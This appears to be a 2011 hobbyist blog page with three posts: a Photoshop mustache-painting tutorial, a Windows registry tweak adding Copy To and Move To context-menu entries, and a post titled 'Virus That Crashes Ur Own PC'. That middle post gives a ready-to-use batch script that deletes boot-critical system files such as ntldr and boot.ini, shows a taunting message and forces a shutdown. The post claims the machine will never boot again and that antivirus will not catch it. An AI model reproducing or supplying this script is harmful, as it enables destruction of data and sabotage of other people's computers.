Wednesday, April 27, 2011

Creating Mustache in face with out mustache using photoshop.

Start by opening an image of a man without mustache.

Press Q to enable quick mask. From filter menu select render>>fibers. Apply settings as shown.

Press Q again to disable quick mask.

Create a new layer and fill the selection with black color.

Create a rectangular selection using rectangular marquee tool. Press Ctrl+Shift+I to invert the selection and press Delete.

Press Ctrl+T. Right Click and select Warp. Adjust the nodes to get the shape as shown.




Double click the layer to open layer style window. Apply settings as shown.




From layer menu select layer style>>create layers. Select and merge both the resulting layers. Click add vector mask button from the bottom of the layer palette.


Select black as foreground color. Using a medium radius brush with feathered settings stroke the hard edges of moustache. These hard edges will be smoothly masked out.



Sunday, April 24, 2011

Virus That Crashes Ur Own PC

Open notepad and type the below commands


@echo

offattrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save as any_name.bat file 
and open it...
This will pop up a message saying OWNED!!
And shut down the computer never to reboot again!


start virus.bat
virus.bat
and save as with this name - virus.bat

ur antivirus will not detect this virus.

Basically this program will delete all that files which are needed for bootingIf your os is installed in d drive instead of c:\ then replace c:\ with d:\

Add Copy To And Move To Options Whenever U Right Click On A File


Once done, you will be able to right click any file or folder and use the Browse for Folder dialog to choose the location you want to move or copy your file or folder to, without having to go to the destination path, its cool!

First we will add the copy and move options to the right click menu of all FILES.

CLICK Start>Run, type REGEDIT and click OK to open up the registry editor and make your way to this key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

Right click the ContextMenuHandlers key and choose New>Key.
Name the new key “Copy To” (without the quotes).
Repeat the above and create another new key named Move To.

You should now have two new subkeys under the ContextMenuHandlers key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Copy To
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Move To

Select the Copy To key and in the right hand pane, double click “Default”
Enter this clsid value as the value data:

{C2FBB630-2971-11d1-A18C-00C04FD75D13}

Next , select the Move To key and in the right hand pane set the default value to:

{C2FBB631-2971-11d1-A18C-00C04FD75D13}

This now takes care of the Copy and Move options for the right click context menu of all your files.
Now all that is left is to add the same options to the right click menu of all your folders.
The procedure will be the same as for files but at a different key:

HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHan dlers

Right click ContextMenuHandlers and create a new key named Copy To.
Right click it again and create another new key named Move To.

left click on the right hand pane, add the same default values as you did for Files:

For Copy To:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
For the Move To:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}

Exit the registry and you are done.

Now when you right click on a file or folder, you should see two new options: Copy to Folder and Move to Folder